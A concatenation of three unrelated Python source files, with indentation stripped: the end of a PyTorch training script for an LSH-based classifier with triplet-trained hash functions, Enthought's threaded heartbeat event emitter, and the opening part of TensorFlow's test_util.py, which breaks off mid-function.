parser.add_argument('--lr', type=float, default=0.001 )
parser.add_argument('--batch_size', type=int, default=128)
parser.add_argument('--layer_dim',type = int, default = 128)
parser.add_argument('--margin', type = float, default = 1)
parser.add_argument('--seed',type = int, default = 17)
parser.add_argument('--print_every', type = int, default = 109)
parser.add_argument('--test_every', type = int, default = 1000)
#parser.add_argument('--num_processes', type=int, default=20)
#parser.add_argument('--cuda_device',type = str, default = "1")
args = parser.parse_args()
now = datetime.now()
time = date_time = now.strftime("%m%d%H%M%S")
logfile = "./inference_slide_log/{}/K{}L{}r{}b{}at{}.txt".format( args.dataset,args.K, args.L, args.rebuild_freq, args.batch_size,time)
print("args",args,file = open(logfile, "a"))
'''
Helpter Function
'''
def get_networkDataLoader(args):
# set up dataset object
train_ds = MultiLabelDataset( DATAPATH_TRAIN[args.dataset])
test_ds = MultiLabelDataset( DATAPATH_TEST[args.dataset])
# feed dataset to create dataloader
# num_works != 0 -> semaphore_Tracker, segmentation fault
train_ld = DataLoader( train_ds, pin_memory = True,num_workers = 0, shuffle = False, batch_size = args.batch_size)
test_ld = DataLoader( test_ds, pin_memory = True,num_workers = 0, shuffle = False, batch_size =args.batch_size)
return train_ld, test_ld, train_ds.D, train_ds.L, train_ds.N, test_ds.N
def get_tripletDataLoader(train_data, num_iter, batch_size = 16, shuffle = True, pin_memory=False):
train_Dataset = Dataset(train_data)
train_dataloader = DataLoader(train_Dataset, batch_size=batch_size, shuffle=shuffle, num_workers=0, pin_memory=pin_memory)
return train_dataloader
def getTripletWeight(triplet_dict):
hash_weight = torch.empty(1)
for l,triplet in triplet_dict.items():
if(l == 0):
hash_weight = triplet.classifier.dense1.weight
else:
hash_weight = torch.cat( (hash_weight,triplet.classifier.dense1.weight), 0)
hash_weight = torch.t(hash_weight)
return hash_weight
def weight_init(m):
if isinstance(m, nn.Conv1d):
init.normal_(m.weight.data)
if m.bias is not None:
init.normal_(m.bias.data)
elif isinstance(m, nn.Conv2d):
init.xavier_normal_(m.weight.data)
if m.bias is not None:
init.normal_(m.bias.data)
elif isinstance(m, nn.Conv3d):
init.xavier_normal_(m.weight.data)
if m.bias is not None:
init.normal_(m.bias.data)
elif isinstance(m, nn.ConvTranspose1d):
init.normal_(m.weight.data)
if m.bias is not None:
init.normal_(m.bias.data)
elif isinstance(m, nn.ConvTranspose2d):
init.xavier_normal_(m.weight.data)
if m.bias is not None:
init.normal_(m.bias.data)
elif isinstance(m, nn.ConvTranspose3d):
init.xavier_normal_(m.weight.data)
if m.bias is not None:
init.normal_(m.bias.data)
elif isinstance(m, nn.BatchNorm1d):
init.normal_(m.weight.data, mean=1, std=0.02)
init.constant_(m.bias.data, 0)
elif isinstance(m, nn.BatchNorm2d):
init.normal_(m.weight.data, mean=1, std=0.02)
init.constant_(m.bias.data, 0)
elif isinstance(m, nn.BatchNorm3d):
init.normal_(m.weight.data, mean=1, std=0.02)
init.constant_(m.bias.data, 0)
elif isinstance(m, nn.Linear):
init.xavier_normal_(m.weight.data)
init.normal_(m.bias.data)
elif isinstance(m, nn.LSTM):
for param in m.parameters():
if len(param.shape) >= 2:
init.orthogonal_(param.data)
else:
init.normal_(param.data)
elif isinstance(m, nn.LSTMCell):
for param in m.parameters():
if len(param.shape) >= 2:
init.orthogonal_(param.data)
else:
init.normal_(param.data)
elif isinstance(m, nn.GRU):
for param in m.parameters():
if len(param.shape) >= 2:
init.orthogonal_(param.data)
else:
init.normal_(param.data)
elif isinstance(m, nn.GRUCell):
for param in m.parameters():
if len(param.shape) >= 2:
init.orthogonal_(param.data)
else:
init.normal_(param.data)
def unpackbits(x, num_bits):
x = x.reshape(-1, 1).int()
to_and = 2 ** torch.arange(num_bits).reshape(1,num_bits).int()
return (x & to_and).bool().int()
'''
Training Related
'''
def train_cl(id, triplet_data, net_loss, opt_cl1, triplet, s_hashcode, device, num_iter):
opt_cl1.zero_grad()
triplet.to(device)
x = triplet_data['arc']
p = triplet_data['pos']
n = triplet_data['neg']
x, p, n = x.to(device).float(), p.to(device).float(), n.to(device).float()
running_loss = 0.0
s_hashcode = torch.tensor(s_hashcode)
#convert hash code to binary representation
binary = unpackbits( s_hashcode, args.K ).to(device).float()
load_weight = (torch.abs(torch.sum(binary,dim =0) - args.batch_size/2) + 0.01 ) / args.batch_size
triplet_loss, emb = triplet.forward(x, p, n)
# task loss = (1-y)*log(prob) + y*log(prob)
newx = x.repeat(1, args.K).view(-1, x.size()[1])
newweight = triplet.classifier.dense1.weight.data.repeat(x.size()[0], 1)
prob = (1 - torch.acos(F.cosine_similarity(newx, newweight).view(-1, args.K))/3.141592653 ).to(device)
#print( (1 - binary) * torch.log(1 - prob + 1e-8 ) + (binary) * torch.log(prob + 1e-8) )
#print( -net_loss * ( (1 - binary) * torch.log(1 - prob + 1e-8 ) + (binary) * torch.log(prob + 1e-8) ))
taskloss = torch.mean( -net_loss * ( (1 - binary) * torch.log(1 - prob + 1e-8 ) + (binary) * torch.log(prob + 1e-8) ) )
loadloss = torch.mean(load_weight * ( (1 - binary) * torch.log(1 - prob + 1e-8 ) + (binary) * torch.log(prob + 1e-8) ) )
#combine loss
# print((1 - binary) * torch.log(1 - prob + 1e-8 ) + (binary) * torch.log(prob + 1e-8))
# print(net_loss)
# print("\ntaskloss",taskloss )
# print("triplet_loss",triplet_loss)
# print("loadloss",loadloss)
tripletloss_weight = 0.1 #use to enable/disbale two loss
taskloss_weight = 1 #use to enable/disbale two loss
load_weight = 0
loss = taskloss * taskloss_weight + triplet_loss * tripletloss_weight + loadloss * load_weight
# print("train_cl loss:", loss.item())
loss.backward()
opt_cl1.step()
# print statistics
running_loss += loss.item()
return running_loss, taskloss
def train_network(args, model, device, train_loader, test_loader,optimizer, epoch, triplet_dict, triplet_opt1_dict,triplet_opt2_dict):
#test before train start
#evaluate(args,model,device,test_loader,1,True)
model.train()
#use triplet network weight as hash table
triplet_flag = True
triplet_baseline = []
avg_triplet_baseline = 0.0
std_triplet_baseline = 1
for idx, (y, x,x_v) in enumerate(train_loader):
optimizer.zero_grad()
x = x.to(device)
logits, new_targets, nsamples, weight_pair,sid, s_hashcode, s_ip, s_r_ip= model.forward(x,x_v,y)
output_dist = F.log_softmax(logits, dim=-1)
loss = F.kl_div(output_dist, new_targets, reduction='sum') / args.batch_size
#loss = F.binary_cross_entropy_with_logits(logits, new_targets, reduction='sum') / args.batch_size
#loss = F.binary_cross_entropy_with_logits(logits.view(-1, nsamples), new_target, reduction='sum') / batch_size
loss.backward()
optimizer.step()
#reset model last extra weight, used for padding
model.weights.data[-1,:].zero_()
model.lshLayer.params.weight.data[-1,:].zero_()
#print train loss
if idx % args.print_every == args.print_every-1: # print every 100 mini-batches
print('===[%d, %5d] Train loss: %.3f, table load: %.3f' % (epoch , idx + 1, loss.item(),model.lshLayer.lsh.stats()))
print("inner product: sampe - random: ", s_r_ip)
#print evaluate accuracy
if idx % args.test_every == args.test_every -1 :
evaluate(args,model,device,test_loader,k = 1,training = True)
evaluate(args,model,device,test_loader,k = 5,training = True)
#collect data for triplet network
weight_pair['arc'] = weight_pair['arc'].detach()
weight_pair['pos'] =weight_pair['pos'].detach()
weight_pair['neg'] =weight_pair['neg'].detach()
to_triplet_loss = F.kl_div(output_dist, new_targets, reduction = 'none')
to_triplet_loss = torch.sum(to_triplet_loss, dim = 1).view(-1,1)
to_triplet_loss = ((to_triplet_loss- torch.mean(to_triplet_loss))/torch.std(to_triplet_loss)).detach()
#processes = []
print_loss = 0
for l in range(args.L):
triple_loss, baseline = train_cl(l, weight_pair, to_triplet_loss, triplet_opt1_dict[l],triplet_dict[l], s_hashcode[:,l], device, idx)
print_loss += triple_loss
# in case parellep on cpu to train triplet
# p = mp.Process(target=train_cl, args=(l, weight_pair, to_triplet_loss, triplet_opt1_dict[l],triplet_dict[l], s_hashcode[:,l], device, idx))
# p.start()
# processes.append(p)
# for p in processes:
# p.join()
#whitening loss
# triplet_baseline += [loss.item()]
# avg_triplet_baseline = np.mean(np.array(triplet_baseline))
# std_triplet_baseline = np.std(np.array(triplet_baseline))
if idx % args.print_every == args.print_every-1: # print every 100 mini-batches
print('===[%d, %5d] Triplet Train loss: %.3f' % (epoch , idx + 1, print_loss / args.L))
#rebuild hash table
if(idx % args.rebuild_freq == 0 and idx!= 0 ):
#print("====[%d, %5d] Rebuild Hash table"% (epoch , idx + 1))
#if flag is true, using triplet weight to set simhash
if(triplet_flag):
model.lshLayer.hash_weight = getTripletWeight(triplet_dict)
model.lshLayer.buildLSH(True)
else:
model.lshLayer.buildLSH(False)
torch.cuda.empty_cache()
evaluate(args,model,device,test_loader,1,False)
evaluate(args,model,device,test_loader,5,False)
def evaluate(args, model, device, loader, k=1,training=False):
model.eval()
N = 0.
correct = 0.
with torch.no_grad():
for batch_idx, (labels, data, value) in enumerate(loader):
batch_size, ml = labels.size()
sizes = torch.sum(labels != -1, dim=1)
data = data.to(device)
output = model(data, value, labels).cpu()
# values, indices = torch.max(output, dim=1)
#print("predicte",indices)
# for bdx in range(batch_size):
# N += 1
# label_set = labels[bdx,:sizes[bdx]].numpy().tolist()
# if indices[bdx].item() in label_set:
# correct+=1
# #print("num of correct",correct)
# #print(N)
values, indices = torch.topk(output, k=k, dim=1)
for bdx in range(batch_size):
label_set = labels[bdx,:sizes[bdx]].numpy().tolist()
for idx in range(k):
N += 1
if indices[bdx, idx].item() in label_set:
correct+=1.
# if idx == 0:
# top1+=1.
if(batch_idx == 20 and training):
# print("predicte",indices)
break
print("{}===Test Accuracy {:.4f}, total_correct {}".format(k,correct/N, correct))
print("{}===Test Accuracy {:.4f}, total_correct {}".format(k, correct/N, correct),file = open(args.logfile, "a"))
model.train()
if __name__ == "__main__":
# args = parser.parse_args()
#set up seed
np.random.seed(args.seed)
torch.manual_seed(0)
#set up cuda
# os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
# os.environ["CUDA_VISIBLE_DEVICES"]= "0,1,5,6"
# use_cuda = torch.cuda.is_available()
# device = torch.device("cuda:1" if use_cuda else "cpu")
mp.set_start_method('spawn')
print("device",device)
#read in train and test data
print("\n===========Read in data: " + args.dataset + "===================")
train_loader, test_loader, feature_dim, num_class, num_train, num_test = get_networkDataLoader(args)
print("Dataset Statistics: feature dimension: %d, label dimension: %d, number of train data: %d, number of test data: %d"
%(feature_dim, num_class, num_train, num_test))
#y,x = next(iter(train_loader))
#print(x)
# set up triplet network
print("\n===========Set Up Triplet Network================")
triplet_dict = {}
triplet_opt1_dict = {}
triplet_opt2_dict = {}
for l in range(args.L):
classifier = Network(args.layer_dim, args.K)
triplet_dict[l] = TripletNet(classifier, args.margin)
triplet_opt1_dict[l] = optim.SGD(triplet_dict[l].parameters(), lr = args.lr, momentum = 0.9)
triplet_opt2_dict[l] = optim.SGD(triplet_dict[l].parameters(), lr = args.lr, momentum = 0.9)
#triplet_dict[l].to(device)
# print("classifier %d"%(l))
# print("network weight0 shape:", triplet_dict[l].classifier.dense1.weight.shape)
# collect weight for hash table
hash_weight = getTripletWeight(triplet_dict).cpu()
print("hash weight shape:", hash_weight.shape)
print("\n============Set Up Network==================")
model = Net(feature_dim, num_class, args.layer_dim, hash_weight, args.K, args.L).to(device)
optimizer = Adam(model.parameters(), lr=0.0001)
# optimizer = optim.SGD(model.parameters(), lr = args.lr, momentum = 0.9)
print("\n============Training start=================")
with open(args.logfile,'w') as out:
for epoch in range(args.epoch_num):
print("Epoch: ", epoch)
train_network(args, model, device, train_loader, test_loader,optimizer, epoch,triplet_dict,triplet_opt1_dict,triplet_opt2_dict)
|
heartbeat.py
|
#
# (C) Copyright 2012 Enthought, Inc., Austin, TX
# All right reserved.
#
# This file is open source software distributed according to the terms in
# LICENSE.txt
#
import sys
import time
import threading
from .abstract_event_manager import BaseEvent
from .package_globals import get_event_manager
if sys.platform == 'win32':
accurate_time = time.clock
else:
accurate_time = time.time
class HeartbeatEvent(BaseEvent):
""" Event which is emitted periodically
"""
pass
class Heartbeat(object):
""" Service which emits an event periodically
Note that unless the event manager uses threaded dispatch, event listeners
which take longer than the interval to perform will result in a slower
heartbeat. The heartbeat runs on its own thread, and as a result, any
listeners will also run on that thread.
The heartbeat is only intended to be approximately accurate, and should not
be used for applications which require precise timing.
"""
def __init__(self, interval=1 / 50., event_manager=None):
self.state = 'waiting'
self.interval = interval
self.frame_count = 0
self.event_manager = (event_manager if event_manager is not None else
get_event_manager())
def run(self):
self.state = 'running'
while self.state in ['running', 'paused']:
if self.state == 'running':
t = accurate_time()
self.event_manager.emit(
HeartbeatEvent(
source=self,
time=t,
frame=self.frame_count,
interval=self.interval))
self.frame_count += 1
# try to ensure regular heartbeat, but always sleep for at least 1ms
wait = max(t + self.interval - accurate_time(), 0.001)
else:
wait = self.interval
time.sleep(wait)
self.state = 'stopped'
def serve(self):
thread = threading.Thread(target=self.run)
thread.daemon = True
thread.start()
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from collections import OrderedDict
import contextlib
import functools
import gc
import itertools
import math
import os
import random
import re
import tempfile
import threading
import time
import unittest
from absl.testing import parameterized
import numpy as np
import six
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import tf2
from tensorflow.python.client import device_lib
from tensorflow.python.client import pywrap_tf_session
from tensorflow.python.client import session
from tensorflow.python.compat.compat import forward_compatibility_horizon
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import tape
from tensorflow.python.framework import config
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import gpu_util
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import tfrt_utils
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import control_flow_util_v2
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import summary_ops_v2
from tensorflow.python.ops import variables
from tensorflow.python.ops.ragged import ragged_ops # pylint: disable=unused-import
from tensorflow.python.ops.ragged import ragged_tensor
from tensorflow.python.ops.ragged import ragged_tensor_value
from tensorflow.python.platform import _pywrap_stacktrace_handler
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import _pywrap_util_port
from tensorflow.python.util import compat
from tensorflow.python.util import deprecation
from tensorflow.python.util import nest
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.compat import collections_abc
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
# If the below import is made available through the BUILD rule, then this
# function is overridden and will instead return True and cause Tensorflow
# graphs to be compiled with XLA.
def is_xla_enabled():
return False
try:
from tensorflow.python.framework.is_xla_test_true import is_xla_enabled # pylint: disable=g-import-not-at-top, unused-import
except Exception: # pylint: disable=broad-except
pass
# Uses the same mechanism as above to selectively enable/disable MLIR
# compilation.
def is_mlir_bridge_enabled():
return None
try:
from tensorflow.python.framework.is_mlir_bridge_test_false import is_mlir_bridge_enabled # pylint: disable=g-import-not-at-top, unused-import
except ImportError:
try:
from tensorflow.python.framework.is_mlir_bridge_test_true import is_mlir_bridge_enabled # pylint: disable=g-import-not-at-top, unused-import
except ImportError:
pass
def _get_object_count_by_type(exclude=()):
return (
collections.Counter([type(obj).__name__ for obj in gc.get_objects()]) -
collections.Counter([type(obj).__name__ for obj in exclude]))
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
@tf_export("test.assert_equal_graph_def", v1=[])
def assert_equal_graph_def_v2(expected, actual):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent. This function
ignores randomized attribute values that may appear in V2 checkpoints.
Args:
expected: The `GraphDef` we expected.
actual: The `GraphDef` we have.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2=True,
hash_table_shared_name=True)
@tf_export(v1=["test.assert_equal_graph_def"])
def assert_equal_graph_def_v1(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
hash_table_shared_name: boolean determining whether to ignore randomized
shared_names that appear in HashTableV2 op defs.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2,
hash_table_shared_name)
def assert_equal_graph_def(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for actual, got %s" %
type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for expected, got %s" %
type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
if hash_table_shared_name:
_strip_hash_table_shared_name(actual)
_strip_hash_table_shared_name(expected)
diff = pywrap_tf_session.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(compat.as_bytes(_SHARDED_SAVE_OP_PATTERN),
attr_tensor_string_value)):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
_TABLE_SHARED_NAME_PATTERN = r"hash_table_[0-9a-z\-]+"
def _strip_hash_table_shared_name(graph_def):
for node in graph_def.node:
delete_keys = []
if node.op == "HashTableV2" and "shared_name" in node.attr:
if re.match(compat.as_bytes(_TABLE_SHARED_NAME_PATTERN),
node.attr["shared_name"].s):
delete_keys.append("shared_name")
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return _pywrap_util_port.IsGoogleCudaEnabled()
def IsBuiltWithROCm():
return _pywrap_util_port.IsBuiltWithROCm()
def IsBuiltWithXLA():
return _pywrap_util_port.IsBuiltWithXLA()
def IsBuiltWithNvcc():
return _pywrap_util_port.IsBuiltWithNvcc()
def GpuSupportsHalfMatMulAndConv():
return _pywrap_util_port.GpuSupportsHalfMatMulAndConv()
def IsMklEnabled():
return _pywrap_util_port.IsMklEnabled()
def InstallStackTraceHandler():
_pywrap_stacktrace_handler.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 3-, 4-, or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {3: [0, 2, 1], 4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
return fn(*args, **kwargs)
return wrapper
return real_skip_if
@contextlib.contextmanager
def skip_if_error(test_obj, error_type, messages=None):
"""Context manager to skip cases not considered failures by the tests.
Note that this does not work if used in setUpClass/tearDownClass.
Usage in setUp/tearDown works fine just like regular test methods.
Args:
test_obj: A test object provided as `self` in the test methods; this object
is usually an instance of `unittest.TestCase`'s subclass and should have
`skipTest` method.
error_type: The error type to skip. Note that if `messages` are given, both
`error_type` and `messages` need to match for the test to be skipped.
messages: Optional, a string or list of strings. If `None`, the test will be
skipped if `error_type` matches what is raised; otherwise, the test is
skipped if any of the `messages` is contained in the message of the error
raised, and `error_type` matches the error raised.
Yields:
Nothing.
"""
if messages:
messages = nest.flatten(messages)
try:
yield
except error_type as e:
if not messages or any(message in str(e) for message in messages):
test_obj.skipTest("Skipping error: {}: {}".format(type(e), str(e)))
else:
raise
def enable_c_shapes(fn):
"""No-op. TODO(b/74620627): Remove this."""
return fn
def with_c_shapes(cls):
"""No-op. TODO(b/74620627): Remove this."""
return cls
def enable_control_flow_v2(fn):
"""Decorator for enabling CondV2 and WhileV2 on a test.
Note this enables using CondV2 and WhileV2 after running the test class's
setup/teardown methods.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
enable_control_flow_v2_old = control_flow_util.ENABLE_CONTROL_FLOW_V2
control_flow_util.ENABLE_CONTROL_FLOW_V2 = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util.ENABLE_CONTROL_FLOW_V2 = enable_control_flow_v2_old
return wrapper
def with_control_flow_v2(cls):
"""Adds methods that call original methods with WhileV2 and CondV2 enabled.
Note this enables CondV2 and WhileV2 in new methods after running the test
class's setup method.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
If a test function has _disable_control_flow_v2 attr set to True (using the
@disable_control_flow_v2 decorator), the v2 function is not generated for it.
Example:
@test_util.with_control_flow_v2
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
@test_util.disable_control_flow_v2("b/xyzabc")
def testDisabledForV2(self):
...
Generated class:
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
def testEnabledForV2WithControlFlowV2(self):
// Enable V2 flags.
testEnabledForV2(self)
// Restore V2 flags.
def testDisabledForV2(self):
...
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return cls
for name, value in cls.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix) and
not getattr(value, "_disable_control_flow_v2", False)):
setattr(cls, name + "WithControlFlowV2", enable_control_flow_v2(value))
return cls
def disable_control_flow_v2(unused_msg):
"""Decorator for a function in a with_control_flow_v2 enabled test class.
Blocks the function from being run with v2 control flow ops.
Args:
unused_msg: Reason for disabling.
Returns:
The wrapped function with _disable_control_flow_v2 attr set to True.
"""
def wrapper(func):
func._disable_control_flow_v2 = True
return func
return wrapper
def enable_output_all_intermediates(fn):
"""Force-enable outputing all intermediates from functional control flow ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
output_all_intermediates_old = \
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = \
output_all_intermediates_old
return wrapper
def assert_no_new_pyobjects_executing_eagerly(func=None, warmup_iters=2):
"""Decorator for asserting that no new Python objects persist after a test.
Runs the test multiple times executing eagerly, first as a warmup and then to
let objects accumulate. The warmup helps ignore caches which do not grow as
the test is run repeatedly.
Useful for checking that there are no missing Py_DECREFs in the C exercised by
a bit of Python.
Args:
func: The function to test.
warmup_iters: The numer of warmup iterations, excluded from measuring.
Returns:
The wrapped function performing the test.
"""
def wrap_f(f):
def decorator(self, *args, **kwargs):
"""Warms up, gets object counts, runs the test, checks for new objects."""
with context.eager_mode():
gc.disable()
# Run the test 2 times as warmup, in an attempt to fill up caches, which
# should not grow as the test is run repeatedly below.
#
# TODO(b/117156879): Running warmup twice is black magic; we have seen
# tests that fail with 1 warmup run, and pass with 2, on various
# versions of python2.7.x.
for _ in range(warmup_iters):
f(self, *args, **kwargs)
